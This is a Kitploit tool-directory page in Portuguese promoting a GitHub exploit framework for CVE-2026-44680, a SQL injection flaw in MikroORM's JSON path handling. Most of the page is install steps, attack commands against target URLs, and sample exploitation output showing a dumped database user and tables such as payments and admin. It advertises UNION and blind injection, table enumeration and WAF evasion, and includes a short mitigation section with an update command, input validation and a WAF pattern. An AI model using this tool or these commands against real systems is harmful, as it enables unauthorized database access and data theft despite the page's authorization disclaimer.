Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — Ferramenta PoC para CVE-2026-44680 que afeta o MikroORM ≤7.0.13. Explora a injeção de caminho JSON para extrair o conteúdo do banco de dados por meio de ataques baseados em UNION. Oferece detecção de vulnerabilidades, extração automatizada de dados, enumeração de tabelas e suporte a injeção cega. Inclui integração de proxy para Burp Suite e técnicas de evasão de WAF. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
Frameworks de Testes de PenetraçãoScanners de VulnerabilidadesAnálise de CódigoExploraçãoSegurança WebSegurança de Banco de Dados
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

Ver Repositório
120há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Ferramenta PoC para CVE-2026-44680 que afeta o MikroORM ≤7.0.13. Explora a injeção de caminho JSON para extrair o conteúdo do banco de dados por meio de ataques baseados em UNION. Oferece detecção de vulnerabilidades, extração automatizada de dados, enumeração de tabelas e suporte a injeção cega. Inclui integração de proxy para Burp Suite e técnicas de evasão de WAF.

Compartilhar

CVE-2026-44680 - Framework de Exploit de Injeção SQL do MikroORM

Python Version License Status CVSS

Ferramenta Profissional de Prova de Conceito para Pesquisadores de Segurança


🔍 Visão Geral

CVE-2026-44680 é uma vulnerabilidade crítica de injeção SQL que afeta o MikroORM, um ORM TypeScript popular para Node.js. Este framework de exploit fornece a pesquisadores de segurança e testadores de penetração uma ferramenta profissional para detectar e explorar a vulnerabilidade.

Autor: Sudeepa Wanigarathna
Versão: 1.0.0
Classificação: Ferramenta Profissional de Pesquisa em Segurança


🚨 Detalhes da Vulnerabilidade

AtributoValor
CVE IDCVE-2026-44680
Pontuação CVSS7.6 (Alta)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosBaixos

Versões Afetadas

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

Causa Raiz

O MikroORM não escapa adequadamente as chaves de caminho JSON controladas em tempo de execução ao construir consultas JSON_EXTRACT. Atacantes podem sair do contexto do caminho JSON e injetar código SQL arbitrário.


✨ Recursos

RecursoDescriçãoStatus
Detecção de VulnerabilidadeDetecção baseada em tempo e em erros✅
Extração do Banco de DadosVersão, banco de dados, usuário, hostname✅
Enumeração de TabelasDescoberta automática de todas as tabelas✅
Injeção Baseada em UNIONExtrai dados via UNION SELECT✅
Injeção CegaExtração de caracteres baseada em booleanos✅
Suporte a ProxyBurp Suite / proxy de interceptação✅
Geração de RelatóriosRelatórios TXT profissionais✅
Evasão de WAFTécnicas avançadas de ofuscação✅

📦 Instalação

Pré-requisitos

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

Passos de Instalação

Passo 1: Clone o Repositório

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

Passo 2: Instale as Dependências

root@kitploit:~
# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

Passo 3: Verifique a Instalação

root@kitploit:~
python exploit.py --help

requirements.txt

root@kitploit:~
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 Início Rápido

Uso Básico

root@kitploit:~
# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 Guia de Uso

Opções de Comando

FlagDescriçãoPadrão
-u, --urlURL alvo (obrigatório)-
-e, --endpointEndpoint da API/api/users/search
-p, --proxyProxy HTTPNenhum
-v, --verboseSaída detalhada (verbose)Falso
--detectApenas detectar vulnerabilidadeFalso
--extractExtrair informações do banco de dadosFalso
--enumerateEnumerar tabelasFalso
--blindModo de injeção cegaFalso

Exemplos de Comandos

1. Exploração Completa

root@kitploit:~
python exploit.py -u http://192.168.1.100:3000

2. Endpoint Personalizado

root@kitploit:~
python exploit.py -u http://target.com -e /api/v2/users/query

3. Com Proxy (Burp Suite)

root@kitploit:~
python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. Depuração Detalhada (Verbose)

root@kitploit:~
python exploit.py -u http://target.com -v --extract

5. Injeção Cega

root@kitploit:~
python exploit.py -u http://target.com --blind

6. Apenas Detecção

root@kitploit:~
python exploit.py -u http://target.com --detect

7. Extrair Informações do Banco de Dados

root@kitploit:~
python exploit.py -u http://target.com --extract

8. Enumerar Tabelas

root@kitploit:~
python exploit.py -u http://target.com --enumerate

📊 Exemplos de Saída

Saída do Console

root@kitploit:~
============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

Arquivos Gerados

root@kitploit:~
exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ Mitigação

Ações Imediatas

1. Atualize o MikroORM

root@kitploit:~
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. Validação de Entrada

root@kitploit:~
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. Regras de WAF

root@kitploit:~
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. Endurecimento do Banco de Dados

  • Aplique o princípio do menor privilégio
  • Use usuários de banco de dados separados
  • Implemente o registro de consultas (query logging)
  • Ative a detecção de injeção SQL

⚠️ Aviso Legal

IMPORTANTE: Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais.

Nota Jurídica

  • ✅ Você DEVE ter permissão explícita antes de testar qualquer sistema
  • ✅ Você é responsável por qualquer dano causado pelo uso indevido
  • ✅ Use de forma ética e relate vulnerabilidades de forma responsável

Diretrizes de Uso Ético

  1. Autorização: Obtenha permissão por escrito do proprietário do sistema
  2. Reporte: Relate as descobertas aos fornecedores afetados de forma responsável
  3. Confidencialidade: Não divulgue vulnerabilidades até que sejam corrigidas
  4. Limitações: Permaneça dentro do escopo do teste autorizado

📄 Licença

Este projeto é licenciado sob a Licença MIT.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

📚 Referências

  • Detalhes do CVE-2026-44680
  • Aviso de Segurança do MikroORM
  • Prevenção de Injeção SQL da OWASP

Feito com ❤️ para a Comunidade de Pesquisa em Segurança

Reportar Bug • Solicitar Recurso • Dar Estrela no GitHub

Baixar ferramenta